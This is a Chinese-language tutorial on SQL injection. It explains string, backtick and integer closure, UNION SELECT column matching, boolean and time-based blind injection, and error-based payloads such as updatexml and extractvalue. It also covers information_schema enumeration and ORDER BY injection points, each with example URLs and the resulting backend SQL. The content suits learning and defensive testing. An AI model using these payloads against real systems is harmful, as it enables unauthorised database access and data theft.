什么是SQL注入

拼接sql得到想要的数据或反应, 而这些sql是不常见的编程逻辑的sql.

SQL语句闭合问题

• 字符串类型闭合

  1. 单引号 - 值的类型是字符串类型
     一般是对where ,if 等表达式的条件值进行引用
     注入URL:

     http://x.x.x.x/name=test' and '1'='1' %23
     

     后端SQL:

     select c1,c2 from db.table where name='test' and '1'='1' #'
     

     解释一下: %23就是#quote后的值, 其中' and '1'='1' #为注入的SQL

     可以发现, name是字符串类型字段, 字符串类型必须使用单引号将变量值括起来才符合SQL语法
     其中 '1'='1' 就是注入点, 可以换成自己的语句

  2. 反引号 - 字段名
     一般是对 group by, order by 等对字段进行操作的表达式中字段名的引用
     注入URL:

     http://x.x.x.x/order=name`, if(1=1,1,2) %23
     

     后端SQL:

     select c1,c2 from db.table order by `name`, if(1=1,1,aaa) #`
     

     解释一下:

     • URL中的name`, if(1=1,1,2) %23, name后的反引号提前把name闭合,紧接着注入了, if(1=1,1,2) %23, %23是#, 直接把后面的sql语句给注释了
     • if里面的aaa是一个不存在(乱写的)的字段名, 其中1=1就是注入点, 可以换成自己的语句, 观察页面变化来进行盲注
     • order by x,y 可以根据多个字段名排序, 当后端做了变量检查可以尝试使用逗号多个字段排序来注入
     • 注意: group by, order by 字段名 的时候, 是可加可不加反引号的, 需要尝试才知道后端代码是否加了反引号

• 整数类型闭合

  注入URL:

  http://x.x.x.x/id=1 and 1=1 %23
  

  后端SQL:

  select c1,c2 from db.table where id=1 and 1=1 #
  

  解释一下:
  整数类型的变量过滤无需单引号, 同样1=1为注入点

SQL注入分类

• UNION SELECT

  union select 可以将后面的select出的数据与前面的select出的结果集进行合并
  

  image.png
  
  union select 所需前置条件

  1. union select的字段数目必须与前面select语句的数目一致
     办法: 使用order by N 进行猜测(N是整数, 代表第几个字段)
     select depts.id, depts.name from depts order by 1
     这里的1是指字段的位置, 代表使用第一个字段进行排序, 如果使用超出字段数目的位置参数排序就会报错, 由此可以推算出select的字段个数, 如下图:
     

     image.png

  2. union select的字段的类型必须与前面的匹配
     办法: 使用 null 代替, 因为所有类型字段都支持null, 如下图所示
     select depts.id, depts.name from depts where id = 1 union select null, null
     

     image.png

• 盲注

  前面的union select 可以将数据暴露到页面上, 但是有些情况无法使用union select, 比如:

  • union select 被WAF过滤
  • http页面返回内容没有变化

  盲注原理:
  顾名思义, 盲注就是我们不能直接的看到数据的展示或变化
  盲注SQL:

  select depts.id, depts.name from depts where id = 1 and if(ascii(substring(database(), 1 ,1)) = 101,1,0)
  

  SQL解释:

  • database() 当前数据库的名字, 在这里是"ec_ops"
  • substring('ec_ops',1,1) 取出'ec_ops'的第一个字符'e'; 第一个1是第一次, 第二个1是步进值为1
  • ascii('e') 将'e'字符转成ascii码; 'e'的ascii为101
  • if(ascii('e')=101,1,0) 当ascii('e')=101为true的时候, 返回1(既true), 否则返回0(既false);
  • id = 1 and if() -- 当左右两个条件同时为true时, 才展示数据,这样可以根据页面数据变化来判断if里面猜测是否正确, if(xx=xx,1,0) 条件为真的值(例子中是1)也可以换成sleep(1), 成功则睡一秒, 根据访问延迟来判断是否成功

  注: 英文可见字符的ascii码范围: 32-127, 逐步实验可以撞出库名的所有字符的ascii码, 也就得出完整的库名

• 报错

  使用报错注入的前置条件
  web后端service开启了报错开关允许打印到web前端显示
  • and 1=(updatexml(1,concat(0x3a,(select user())),1)) 获取当前数据库用户
  • and extractvalue(0x7e,concat(0x7e,user())) 获取当前数据库用户
  • and exp(~（select * from(select user())a）) 获取当前数据库服务器类型
  • and linestring(id) 快速获得当前库名、表名
  • ....

练手

• MySQL
  information_schema 存放着数据库的所有信息, 包括有哪些库, 表, 字段
  • select schema_name from information_schema.schemata -- 所有数据库名
  • select table_name from information_schema.tables where table_schema = 'db_name' --获取db_name的所有表
  • select column_name from information_schema.columns where table_schema = 'db_name' and table_name = 'table_name' --获取db_name.table_name的所有字段名

常见注入点

• WHERE column_name [ = | like ] value
  select c1,c2 from tables where id = 1 [ and | having ] condition
  使用 and / having 或 "union select" 连接其他sql语句
  

  image.png

• ORDER BY column_name

  例1: select id, name from ec_ops.depts order by if(1=1,id,name)
  当1=1为真时, 以id进行排序, 否则以name排序, 1=1可以换成其他sql语句
  注意: 如果将if里的id换为sleep(1), 每条数据都会睡一次, 如果有300条数据则睡300秒, 即使加limit 1也没用 慎用

  例2: select id, name from ec_ops.depts order by rand()
  随机排序

  例3:

  select id from depts order by 
      case 
          when 1=1          # 当1=1为真以id排序
              then id 
          when 1=2          # 当1=2为真以name排序
              then name
          when 1=3          # 当1=3为真以title排序
              then title
          else author       # 以上条件都不符合则以author排序
      end
  

  总结: order by就是利用不同字段排序, 来观察数据变化从而进行盲注